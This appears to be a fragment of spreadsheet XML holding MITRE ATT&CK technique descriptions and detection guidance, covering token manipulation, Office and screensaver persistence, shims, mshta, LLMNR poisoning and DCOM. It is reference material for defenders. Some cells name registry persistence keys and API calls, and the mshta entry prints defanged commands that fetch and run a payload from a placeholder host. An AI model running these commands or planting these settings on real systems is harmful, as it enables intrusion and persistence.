* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>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Management](https://attack.mitre.org/techniques/T1028) can also be used externally.
Adversaries may use remote services to initially access and/or persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.</t>
  </si>
  <si>
    <t>persistence,initial-access</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. 
There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)</t>
  </si>
  <si>
    <t>Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)
Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Access tokens can be leveraged by adversaries through three methods:(Citation: BlackHat Atkinson Winchester Token Manipulation)
**Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
**Create Process with a Token** - An adversary creates a new access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and uses it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
**Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges.(Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)</t>
  </si>
  <si>
    <t>macOS,Windows,AWS,GCP,Azure</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</si>
  <si>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related to legitimate remote system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
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
### Windows
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)
[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
### Mac
On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.
### Cloud
Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure AD,Azure,Office 365</t>
  </si>
  <si>
    <t>Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
### Windows
The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.
### Office 365
An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)</t>
  </si>
  <si>
    <t>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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
For the Outlook rules and forms methods, Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
### Office Template Macros
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template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loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;code&gt;C:\Users\\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;code&gt;C:\Users\\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
### Office Test
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
### Add-ins
Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
### Outlook Rules, Forms, and Home Page
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
To abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)</t>
  </si>
  <si>
    <t>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)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[Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>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[Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)
Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Payloads may be compressed, archived, or encrypted in order to avoid detection.  These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. 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 Adversaries may also used compressed or archived scripts, such as Javascript.</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,User interface,PowerShell logs</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Scripting](https://attack.mitre.org/techniques/T1064) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).</t>
  </si>
  <si>
    <t>Windows event logs,PowerShell logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.
### Windows
There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.  (Citation: PowerShell About 2019)
### Mac
The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)
</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Application whitelisting,Anti-virus</t>
  </si>
  <si>
    <t>Log analysis,Host forensic analysis</t>
  </si>
  <si>
    <t>Application whitelisting,Process whitelisting,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the &lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python  (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the &lt;code&gt;~/.bash_profile&lt;/code&gt; script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the &lt;code&gt;~/.bashrc&lt;/code&gt; script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. 
The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware).</t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension &lt;code&gt;.hta&lt;/code&gt;. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>Application whitelisting,Digital Certificate Validation</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and Relay</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>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 (Citation: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In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. 
COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>lateral-movement,execution</t>
  </si>
  <si>
    <t>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. 
Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)
Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)</t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt; on 64-bit Windows systems, along with screensavers included with base Windows installations. 
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Data Execution Prevention</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process whitelisting,Anti-virus,Whitelisting by file name or path,Signature-based detection</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>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(Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
